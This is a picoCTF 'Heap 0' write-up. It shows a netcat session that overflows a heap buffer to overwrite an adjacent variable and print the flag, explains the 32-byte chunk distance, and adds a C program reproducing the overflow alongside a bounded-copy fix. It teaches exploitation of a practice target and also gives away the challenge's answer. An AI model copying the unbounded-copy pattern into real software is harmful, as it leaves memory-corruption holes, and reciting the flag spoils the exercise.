Pico CTF


Heap 0

Description

Are overflows just a stack concern? Download the binary here. Download the source here.

nc tethys.picoctf.net 49664

Hints

  1. What part of the heap do you have control over and how far is it from the safe_var?

Solution

picoCTF{my_first_heap_overflow_e4c92a78}

CLI

kappa@kappa-Aspire-Z5600:~$ nc tethys.picoctf.net 49664

Welcome to heap0!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.

Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x59132c59c2b0 -> pico
+-------------+----------------+
[*] 0x59132c59c2d0 -> bico
+-------------+----------------+

1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit

Enter your choice: 3

Take a look at my variable: safe_var = bico

1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit

Enter your choice: 2
Data for buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit

Enter your choice: 4

YOU WIN
picoCTF{my_first_heap_overflow_e4c92a78}
kappa@kappa-Aspire-Z5600:~$

Explanation

The heap-state dump gives the two addresses we need. The pair below comes from a separate run: ASLR moves the heap base every time the service starts, but the distance between the two chunks does not change.

  • The address of input_data is 0x63c3882552b0
  • The address of safe_var is 0x63c3882552d0

Subtracting these two addresses:

  • 0x63c3882552d0 - 0x63c3882552b0 = 0x20
  • 0x20 in hexadecimal is 32 in decimal

The same arithmetic on the transcript above (0x59132c59c2d0 - 0x59132c59c2b0) also gives 0x20. The gap is much larger than the four-byte "pico" string because glibc rounds each small malloc request up to a minimum-sized chunk and keeps an 8-byte size field in front of each one; input_data's usable bytes run straight into that header and then into safe_var.

So, inputting a string of 33 characters or more fills the 32 bytes between the two pointers and puts the 33rd character over the "b" of "bico" in safe_var. Option 2 reads the input with no length limit, so nothing stops the write; check_win() then sees that safe_var no longer equals "bico" and prints the flag.
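The layout above can be reproduced locally. The following C program is an added example written for this write-up, not the challenge's own source or solve script: it allocates the two strings the same way (the allocation size of 5 is an assumption, since the challenge source is not on this page), computes the distance between them at run time instead of reading it off the menu, builds the write-up's payload of distance + 1 bytes, and pushes it through an unbounded copy (standing in for the challenge's input routine) and then through a bounded copy, which is the fix. It assumes Linux with glibc on a 64-bit machine and GCC or Clang; heap_distance, build_payload, run_heap0 and the other names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed allocation size: just enough for "pico"/"bico" plus the NUL.
 * The challenge source is not on this page; 5 is a guess that reproduces
 * the 0x20 spacing seen in the transcript on glibc x86-64. */
#define ALLOC_SIZE 5
#define SAFE_VALUE "bico"
#define MAX_DISTANCE 4096   /* sanity bound for the layout assumption */

/* Hide a pointer's origin from the optimiser so it cannot assume that a
 * write through input_data never reaches safe_var (they are separate
 * malloc results, which the compiler otherwise treats as non-aliasing). */
#define LAUNDER(p) __asm__ __volatile__("" : "+r"(p) : : "memory")

/* Payload buffer shared by the demo run and the checks below. */
static char payload_buf[MAX_DISTANCE + 2];

/* Bytes from the start of input_data to the start of safe_var: the
 * subtraction the write-up does by hand. */
static ptrdiff_t heap_distance(const char *input_data, const char *safe_var)
{
    return (ptrdiff_t)((uintptr_t)safe_var - (uintptr_t)input_data);
}

/* Filler up to safe_var plus one byte that lands on it, NUL-terminated.
 * Returns the payload length (without the NUL), or 0 if out is too small. */
static size_t build_payload(size_t distance, char *out, size_t out_len)
{
    size_t len = distance + 1;
    if (len + 1 > out_len)
        return 0;
    memset(out, 'A', len);
    out[len] = '\0';
    return len;
}

/* The challenge's win condition: any change to safe_var counts. */
static int check_win(const char *safe_var)
{
    return strcmp(safe_var, SAFE_VALUE) != 0;
}

/* Unbounded copy: the same behaviour as reading "%s" into a small buffer. */
static void copy_unbounded(char *dst, const char *src)
{
    while ((*dst++ = *src++) != '\0')
        ;
}

/* Bounded copy (the fix): never writes more than dst_len bytes. */
static void copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = 0;
    while (n < dst_len - 1 && src[n] != '\0')
        n++;
    memcpy(dst, src, n);
    dst[n] = '\0';
}

/* Set up input_data/safe_var like the challenge, feed the payload through
 * one of the two copies, and report whether safe_var changed:
 *   1  safe_var was modified (the flag would print)
 *   0  safe_var intact
 *  -1  allocator did not place safe_var shortly after input_data, so the
 *      experiment was not run (layout assumption does not hold here) */
static int run_heap0(int bounded)
{
    char *input_data = malloc(ALLOC_SIZE);
    char *safe_var = malloc(ALLOC_SIZE);
    if (input_data == NULL || safe_var == NULL) {
        free(input_data);
        free(safe_var);
        return -1;
    }
    LAUNDER(input_data);
    LAUNDER(safe_var);
    strncpy(input_data, "pico", ALLOC_SIZE);
    strncpy(safe_var, SAFE_VALUE, ALLOC_SIZE);

    ptrdiff_t distance = heap_distance(input_data, safe_var);
    if (distance <= 0 || distance > MAX_DISTANCE) {
        free(input_data);
        free(safe_var);
        return -1;
    }
    size_t len = build_payload((size_t)distance, payload_buf, sizeof payload_buf);
    printf("safe_var - input_data = %td bytes, payload = %zu bytes\n", distance, len);

    if (bounded)
        copy_bounded(input_data, ALLOC_SIZE, payload_buf);
    else
        copy_unbounded(input_data, payload_buf);   /* runs into safe_var's chunk */

    int won = check_win(safe_var);
    printf("%s copy: safe_var = \"%s\" -> %s\n", bounded ? "bounded" : "unbounded",
           safe_var, won ? "YOU WIN" : "no change");

    /* The unbounded copy also trampled the size field in front of safe_var,
     * so those chunks are deliberately leaked rather than handed to free(). */
    if (bounded) {
        free(input_data);
        free(safe_var);
    }
    return won;
}

int main(void)
{
    run_heap0(0);   /* vulnerable, as in the challenge */
    run_heap0(1);   /* fixed */
    return 0;
}
```

On glibc x86-64 the first run reports a distance of 32 and a 33-byte payload, and safe_var comes back starting with "A"; the bounded run leaves it as "bico". The vulnerable run never frees its chunks because the overflow also overwrote the size field of safe_var's chunk, and glibc would abort on the corrupted header; the challenge gets away with this for the same reason, it never frees before printing the flag.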